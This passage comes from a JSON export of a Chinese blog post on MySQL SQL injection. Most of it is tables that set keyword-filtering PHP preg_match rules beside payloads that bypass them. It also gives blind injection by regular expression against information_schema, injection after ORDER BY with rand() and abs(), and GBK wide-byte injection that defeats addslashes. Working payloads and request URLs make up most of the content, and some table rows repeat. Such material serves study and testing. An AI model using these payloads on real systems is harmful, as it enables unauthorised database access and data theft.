1=1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4e0b\u9762\u8fd9\u79cd\u65b9\u5f0f\u4f60\u9700\u8981\u5df2\u7ecf\u77e5\u9053\u4e00\u4e9b\u8868\u548c\u5b57\u6bb5\u540d\uff08\u53ef\u4ee5\u5229\u7528substring\u51fd\u6570\u53bb\u4e00\u4e2a\u4e00\u4e2a\u83b7\u5f97information_schema.columns\u8868\u4e2d\u7684\u6570\u636e\uff09<\/p>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>union select user,password from users<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users where userid=1)=&#8217;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = 
&#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users group by user_id having user_id = 1) = &#8216;admin&#8217;#user_id\u805a\u5408\u4e2duser_id\u4e3a1\u7684user\u4e3aadmin<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users group by user_id having user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select substr(group_concat(user_id),1,1) user from users ) = 1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, 
select<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select substr(gruop_concat(user_id),1,1) user from users) = 1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = &#8216;a&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select substr(gruop_concat(user_id),1,1) user from users) = 1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; user_id is not null 1 &amp;&amp; substr(user,1,1) = 0x61 1 &amp;&amp; substr(user,1,1) = unhex(61)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;|hex)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = unhex(61)<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = lower(conv(11,10,16)) #\u5341\u8fdb\u5236\u768411\u8f6c\u5316\u4e3a\u5341\u516d\u8fdb\u5236\uff0c\u5e76\u5c0f\u5199\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex, substr<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group 
by|select|\\&#8217;|hex|substr)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = lower(conv(11,10,16))<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; lpad(user,7,1)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex, substr, \u7a7a\u683c<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;|hex|substr|\\s)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; lpad(user,7,1)<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1%0b||%0blpad(user,7,1)<\/td>\n<\/tr>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 || (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 || (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u5229\u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u8fdb\u884c\u76f2\u6ce8<\/h4>\n<p>\u6211\u4eec\u90fd\u5df2\u7ecf\u77e5\u9053\uff0c\u5728MYSQL 5+\u4e2d information_schema\u5e93\u4e2d\u5b58\u50a8\u4e86\u6240\u6709\u7684 \u5e93\u540d\uff0c\u8868\u540d\u4ee5\u53ca\u5b57\u6bb5\u540d\u4fe1\u606f\u3002\u6545\u653b\u51fb\u65b9\u5f0f\u5982\u4e0b\uff1a<br \/>\n1\u3001\u5224\u65ad\u7b2c\u4e00\u4e2a\u8868\u540d\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u662fa-z\u4e2d\u7684\u5b57\u7b26,\u5176\u4e2dblind_sqli\u662f\u5047\u8bbe\u5df2\u77e5\u7684\u5e93\u540d\u3002<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables 
WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^[a-z]' LIMIT 0,1) \/*\n<\/pre>\n<p>2\u3001\u5224\u65ad\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u662fa-n\u4e2d\u7684\u5b57\u7b26<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^[a-n]' LIMIT 0,1)\/*\n<\/pre>\n<p>3\u3001\u786e\u5b9a\u8be5\u5b57\u7b26\u4e3an<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^n' LIMIT 0,1) \/*\n<\/pre>\n<p>4\u3001\u8868\u8fbe\u5f0f\u7684\u66f4\u6362\u5982\u4e0b<\/p>\n<pre class=\"highlight\">'^n[a-z]' -&gt; '^ne[a-z]' -&gt; '^new[a-z]' -&gt; '^news[a-z]' -&gt; FALSE \n<\/pre>\n<p>\u8fd9\u65f6\u8bf4\u660e\u8868\u540d\u4e3anews \uff0c\u8981\u9a8c\u8bc1\u662f\u5426\u662f\u8be5\u8868\u540d \u6b63\u5219\u8868\u8fbe\u5f0f\u4e3a&#8217;^news$&#8217;\uff0c\u4f46\u662f\u6ca1\u8fd9\u5fc5\u8981 \u76f4\u63a5\u5224\u65ad table_name = &#8216;news&#8217; \u4e0d\u5c31\u884c\u4e86\u3002<br \/>\n5\u3001\u63a5\u4e0b\u6765\u731c\u89e3\u5176\u5b83\u8868\u4e86 \u53ea\u9700\u8981\u4fee\u6539 limit 1,1 -&gt; limit 2,1\u5c31\u53ef\u4ee5\u5bf9\u63a5\u4e0b\u6765\u7684\u8868\u8fdb\u884c\u76f2\u6ce8\u4e86\u3002<\/p>\n<h4>order by\u540e\u7684\u6ce8\u5165<\/h4>\n<p>order by\u7531\u4e8e\u662f\u6392\u5e8f\u8bed\u53e5\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u6761\u4ef6\u8bed\u53e5\u505a\u5224\u65ad\uff0c\u6839\u636e\u8fd4\u56de\u7684\u6392\u5e8f\u7ed3\u679c\u4e0d\u540c\u5224\u65ad\u6761\u4ef6\u7684\u771f\u5047\u3002<br \/>\n\u4e00\u822c\u5e26\u6709order\u6216\u8005orderby\u7684\u53d8\u91cf\u5f88\u53ef\u80fd\u662f\u8fd9\u79cd\u6ce8\u5165\uff0c\u5728\u77e5\u9053\u4e00\u4e2a\u5b57\u6bb5\u7684\u65f6\u5019\u53ef\u4ee5\u91c7\u7528\u5982\u4e0b\u65b9\u5f0f\u6ce8\u5165\uff1a<br \/>\n\u539f\u59cb\u94fe\u63a5\uff1ahttp:\/\/www.test.com\/list.php?order=vote \u6839\u636evote\u5b57\u6bb5\u6392\u5e8f\u3002<br 
\/>\n\u627e\u5230\u6295\u7968\u6570\u6700\u5927\u7684\u7968\u6570num\u7136\u540e\u6784\u9020\u4ee5\u4e0b\u94fe\u63a5\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=abs(vote-(length(user())&gt;0)*num)+asc\n<\/pre>\n<p>\u770b\u6392\u5e8f\u662f\u5426\u53d8\u5316\u3002<br \/>\n\u8fd8\u6709\u4e00\u79cd\u65b9\u6cd5\u4e0d\u9700\u8981\u77e5\u9053\u4efb\u4f55\u5b57\u6bb5\u4fe1\u606f\uff0c\u4f7f\u7528rand\u51fd\u6570\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=rand(true)\nhttp:\/\/www.test.com\/list.php?order=rand(false)\n<\/pre>\n<p>\u4ee5\u4e0a\u4e24\u4e2a\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u6392\u5e8f\uff0c\u5224\u65ad\u8868\u540d\u4e2d\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u5c0f\u4e8e128\u7684\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)&lt;=128))\n<\/pre>\n<h4>\u5bbd\u5b57\u8282\u6ce8\u5165<\/h4>\n<p>sql\u6ce8\u5165\u4e2d\u7684\u5bbd\u5b57\u8282\u56fd\u5185\u6700\u5e38\u4f7f\u7528\u7684gbk\u7f16\u7801\uff0c\u8fd9\u79cd\u65b9\u5f0f\u4e3b\u8981\u662f\u7ed5\u8fc7addslashes\u7b49\u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u79fb\u7684\u7ed5\u8fc7\u3002\u53cd\u659c\u6760()\u7684\u5341\u516d\u8fdb\u5236\u4e3a%5c\uff0c\u5728\u4f60\u8f93\u5165%bf%27\u65f6\uff0c\u51fd\u6570\u9047\u5230\u5355\u5f15\u53f7\u81ea\u52a8\u8f6c\u79fb\u52a0\u5165\\\uff0c\u6b64\u65f6\u53d8\u4e3a%bf%5c%27\uff0c%bf%5c\u5728gbk\u4e2d\u53d8\u4e3a\u4e00\u4e2a\u5bbd\u5b57\u7b26\u201c\u7e17\u201d\u3002%bf\u90a3\u4e2a\u4f4d\u7f6e\u53ef\u4ee5\u662f%81-%fe\u4e2d\u95f4\u7684\u4efb\u4f55\u5b57\u7b26\u3002\u4e0d\u6b62\u5728sql\u6ce8\u5165\u4e2d\uff0c\u5bbd\u5b57\u7b26\u6ce8\u5165\u5728\u5f88\u591a\u5730\u65b9\u90fd\u53ef\u4ee5\u5e94\u7528\u3002<br \/>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>\u9ed8\u8ba4\u5b58\u5728\u7684\u6570\u636e\u5e93\uff1a mysql \u9700\u8981root\u6743\u9650\u8bfb\u53d6 
information_schema \u57285\u4ee5\u4e0a\u7684\u7248\u672c\u4e2d\u5b58 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[180],"tags":[369],"_links":{"self":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439"}],"collection":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=439"}],"version-history":[{"count":1,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions"}],"predecessor-version":[{"id":440,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions\/440"}],"wp:attachment":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}